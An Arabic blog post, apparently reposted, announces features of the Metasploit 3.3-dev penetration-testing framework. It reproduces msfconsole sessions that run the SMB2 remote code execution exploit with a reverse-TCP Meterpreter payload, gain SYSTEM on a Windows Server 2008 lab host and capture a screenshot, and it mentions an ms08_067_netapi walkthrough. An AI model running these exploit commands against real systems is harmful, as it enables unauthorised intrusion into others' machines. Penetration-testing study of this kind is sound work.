تحديث الصفحة تطويرات وميزات جديدة في ميتا سبلويت 3.3-dev
بعد اجراء العديد من التطويرات على مشروع ميتا سبلويت منذ الاصدار 3.2 أعلن H.D Moore المطوّر الرئيسي لمشروع الثغرات ميتا سبلويت بتدوينة كتبها بتاريخ البارحة عن بعض الميزات والثغرات الجديدة التي تم تطويرها بالاضافة لتوفير الاصدار 3.3-dev من ميتا سبلويت بشكل حزمة مضغوطة ليتم تحميلها من موقع المشروع.
يعتبر ميتا سبلويت هو مشروع الثغرات الأول في عالم الهاكرز حيث يحتوي ميتا سبلويت على العديد من الثغرات الجهازة للاستغلال عن بعد والتي يتم تحديثها بشكل مستمر بالاضافة للعديد من الأدوات المساعدة التي يستخدمها الهاكرز والـ Penetration Testers في عملهم لتساعدهم على اختبار أمن الشبكة وحماية الأجهزة الموجودة فيها من الثغرات.
من الأمور التي تم الانتهاء من تطويرها هي اضافة امكانية أخذ صورة لسطح مكتب الجهاز الذي تم اختراقه عن طريق استغلال Meterpreter وذلك كما وضّح HDM:
meterpreter > migrate 1736[*] Migrating to 1736...[*] Migration completed successfully.
meterpreter > screenshot /tmp/boom.bmp[*] Image saved to /tmp/boom.bmp Opening browser to image.
أما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7.
عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع ****sploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!!
msf> use exploit/windows/smb/smb2_negotiate_func_index msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp msf (exploit/smb2) > set LHOST 192.168.0.136 msf (exploit/smb2) > set LPORT 5678 msf (exploit/smb2) > set RHOST 192.168.0.211 msf (exploit/smb2) > exploit[*] Started reverse handler[*] Connecting to the target (192.168.0.211:445)...[*] Sending the exploit packet (854 bytes)...[*] Waiting up to 180 seconds for exploit to trigger...[*] Sending stage (719360 bytes)[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo Computer: WIN-UAKGQGDWLX2 OS : Windows 2008 (Build 6001, Service Pack 1). Arch : x86 ********: en_US
meterpreter > getuid Server user****: NT AUTHORITY\SYSTEM
يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي:
auxiliary/scanner/smb/smb2
طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر.
الكاتب عبدالمهيمن ************************************************** *********************** بعد تحميل dev-3.3 لتشغيلها نذهب إلي مجلد البرنامج C:\msf3\msf***.bat
بعد الإقتباس نرجع للتطبيق علي جهاز وهمي سنقوم بإختيار الثغرة الشهيرة ms08_067_netapi والشرح بالصور
This image has been resized. Click this bar to view the full image. The original image is sized 1024x768.
This image has been resized. Click this bar to view the full image. The original image is sized 600x450.
This image has been resized. Click this bar to view the full image. The original image is sized 600x450.
This image has been resized. Click this bar to view the full image. The original image is sized 600x450.
Aucun commentaire:
Enregistrer un commentaire